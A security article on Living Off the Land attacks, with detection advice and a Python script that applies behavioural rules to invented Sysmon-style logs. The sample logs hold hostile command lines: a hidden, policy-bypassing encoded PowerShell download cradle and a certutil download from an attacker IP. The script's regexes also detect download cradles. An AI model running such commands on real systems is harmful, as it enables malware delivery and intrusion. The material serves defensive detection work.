I write frequently about the threat of malware and how threat actors are using it to do everything from stealing personal information to completely taking over users' devices or adding them to botnets. This malware is spread through various forms of phishing, ClickFix attacks, malicious advertising, and even apps that have been vetted and approved by Apple and Google.
However, as users (and security tools) have become better at recognising the signs of a malware infection, and savvy enough to avoid one in the first place, some cybercriminals have changed tactics: Living Off the Land (LOTL) attacks use built-in system utilities and already-trusted tools, which are far less likely to raise red flags than a newly dropped binary.
How Living Off the Land attacks work
As Huntress describes it, LOTL is about using local resources instead of importing new ones from outside. Rather than smuggling custom malware onto a user's machine, attackers misuse tools that are already present, such as PowerShell, Windows Management Instrumentation (WMI), other built-in utilities, and trusted applications like Microsoft Teams. Antivirus programs are unlikely to flag these tools as suspicious (in most cases they are not malicious) because their activity blends in with normal system processes and they are expected to be there.
By hijacking legitimate tools, threat actors can gain access to systems and networks, execute code remotely, escalate privileges, steal data, or install other forms of malware. PowerShell is a favourite because its command line can download a file and execute it in a single step; WMI is popular for the same reason, and built-in Unix binaries and legitimately signed (but vulnerable) Windows drivers are commonly abused in the same way.
LOTL attackers also use exploit kits that deliver fileless malware through phishing or other forms of social engineering, as well as stolen credentials and fileless ransomware, to gain access. Malwarebytes Labs recently identified a campaign, distributed via fake Google Meet updates, that abused a legitimate Windows device enrollment feature, with the attack server hosted on a reputable mobile device management platform.
How to detect a LOTL attack
Many of the tactics for identifying, addressing and preventing LOTL attacks are aimed at organizations with large defensive infrastructures, but individual users can (and should) also be vigilant about this type of threat. As always, be on the lookout for signs of phishing and other forms of social engineering that bad actors use to steal credentials and gain access to networks and devices. Be wary of unsolicited communications containing links, notifications about software and security updates, and anything that provokes curiosity, anxiety, urgency, or fear. Install security updates as soon as they are available so that known vulnerabilities are closed before they can be exploited.
When it comes to detecting LOTL specifically, Huntress advises looking for unusual behavior rather than just suspicious files or programs: for example, tools running outside their normal context or in unexpected patterns, and unusual network connections originating from system utilities. Monitor and log the use of commonly abused tools, audit every remote access tool in use, and review device logs.
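The following script is an added illustration of that "context, not files" advice; it is not code from Huntress or from the original article. It runs a handful of behavioural rules over constructed sample telemetry (the key=value line format, host name, process IDs and IP addresses are all invented for this example, loosely modelled on Sysmon process-creation and network-connection events): a shell spawned by an Office application, PowerShell launched with a hidden window, policy bypass and an encoded command (which the script decodes and scans), certutil used as a downloader, a shell spawned by the WMI provider host, and network connections from utilities that normally have no reason to talk to the network. A benign PowerShell backup script started from Explorer is included to show that the same tool in its normal context produces no alert.

```python
import base64
import re
from dataclasses import dataclass

# Constructed sample telemetry for this example: not real logs. Hosts, PIDs,
# paths and addresses are invented; the base64 blob decodes to "IEX (New-Object".
SAMPLE_LOG = r'''
ts=2024-05-02T10:15:01Z evt=ProcessCreate host=WS01 pid=4120 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" cmdline="powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
ts=2024-05-02T10:15:03Z evt=NetworkConnect host=WS01 pid=4120 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe dst=203.0.113.10:443
ts=2024-05-02T10:16:10Z evt=ProcessCreate host=WS01 pid=4310 image=C:\Windows\System32\certutil.exe parent=C:\Windows\System32\cmd.exe cmdline="certutil.exe -urlcache -split -f http://203.0.113.10/update.bin C:\Users\Public\update.bin"
ts=2024-05-02T10:16:11Z evt=NetworkConnect host=WS01 pid=4310 image=C:\Windows\System32\certutil.exe dst=203.0.113.10:80
ts=2024-05-02T10:20:00Z evt=ProcessCreate host=WS01 pid=4500 image=C:\Windows\System32\cmd.exe parent=C:\Windows\System32\wbem\WmiPrvSE.exe cmdline="cmd.exe /c whoami"
ts=2024-05-02T11:02:45Z evt=ProcessCreate host=WS01 pid=5120 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\explorer.exe cmdline="powershell.exe -File C:\Scripts\backup.ps1"
ts=2024-05-02T11:02:50Z evt=NetworkConnect host=WS01 pid=5120 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe dst=10.0.0.5:445
'''

# key=value or key="value with spaces"
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Built-in binaries that rarely need network access in normal use.
NO_NETWORK_EXPECTED = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wmic.exe", "msbuild.exe"}

# Command-line traits typical of malicious PowerShell use (case-insensitive).
POWERSHELL_PATTERNS = {
    "encoded-command": re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s"),   # -e / -enc / -EncodedCommand
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "execution-policy-bypass": re.compile(r"(?i)-e(?:xecution)?p(?:olicy)?\s+bypass"),
    "download-cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|invoke-expression|\biex\b"),
}
ENCODED_ARG_RE = re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)")


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: str
    image: str
    detail: str


def parse_events(text):
    """Turn key=value lines into dicts, honouring double-quoted values."""
    events = []
    for line in text.strip().splitlines():
        if line.strip():
            events.append({m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
                           for m in FIELD_RE.finditer(line)})
    return events


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    findings = []
    flagged_pids = set()  # processes already judged suspicious; later network activity is correlated

    def record(ev, rule, detail):
        findings.append(Finding(rule, ev.get("pid", "?"), basename(ev.get("image", "")), detail))
        flagged_pids.add(ev.get("pid", "?"))

    for ev in events:
        image = basename(ev.get("image", ""))
        if ev.get("evt") == "ProcessCreate":
            parent = basename(ev.get("parent", ""))
            cmd = ev.get("cmdline", "")
            if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
                record(ev, "office-spawns-script-host", f"parent={parent}")
            if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:   # remote WMI process creation
                record(ev, "wmi-spawns-script-host", cmd)
            if image in {"powershell.exe", "pwsh.exe"}:
                decoded = decode_encoded_command(cmd)
                to_scan = cmd if decoded is None else cmd + " " + decoded   # scan the decoded payload too
                for rule, rx in POWERSHELL_PATTERNS.items():
                    if rx.search(to_scan):
                        record(ev, rule, decoded if (rule == "download-cradle" and decoded) else cmd)
            if image == "certutil.exe" and re.search(r"(?i)-urlcache", cmd):
                record(ev, "certutil-download", cmd)
        elif ev.get("evt") == "NetworkConnect":
            dst = ev.get("dst", "?")
            if image in NO_NETWORK_EXPECTED:
                record(ev, "lolbin-network-connection", f"dst={dst}")
            elif ev.get("pid") in flagged_pids:
                record(ev, "flagged-process-network-connection", f"dst={dst}")
    return findings


if __name__ == "__main__":
    for f in analyze(parse_events(SAMPLE_LOG)):
        print(f"[{f.rule}] pid={f.pid} image={f.image} {f.detail}")
```

The rules are deliberately about context (who launched the tool, how, and whether it then reached the network) rather than about file hashes, which is what makes them useful against LOTL. On real telemetry you would tune the parent/child and no-network lists to your own environment's baseline, since a line-of-business app that legitimately drives PowerShell, or a management agent that uses certutil, would otherwise be a steady source of false positives.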